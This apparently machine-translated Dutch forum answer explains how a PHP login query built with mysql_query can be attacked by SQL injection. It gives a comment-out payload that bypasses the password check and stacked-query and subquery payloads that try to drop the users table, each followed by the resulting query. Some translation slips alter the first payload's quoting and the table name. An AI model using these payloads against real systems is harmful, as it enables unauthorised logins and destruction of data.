Iets als dit zou moeten doen:
- Om in te loggen als gebruiker "foo", stelt u de gebruikersnaam in op "foo" -- "
Hierdoor ziet uw zoekopdracht eruit als
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
De "-- " betekent dat de rest van de regel is uitgecommentarieerd
- Weet niet zeker of dit zal werken, maar probeer de gebruikersnaam in te stellen op "foo' OR (DROP TABLE-gebruikers) -- "
Hierdoor ziet uw zoekopdracht er als volgt uit:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
kan dat echter niet accepteren - ik denk dat subquery's alleen kunnen SELECTEREN.
De functie mysql_query zal slechts één query uitvoeren - anderen zouden u dit laten doen:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");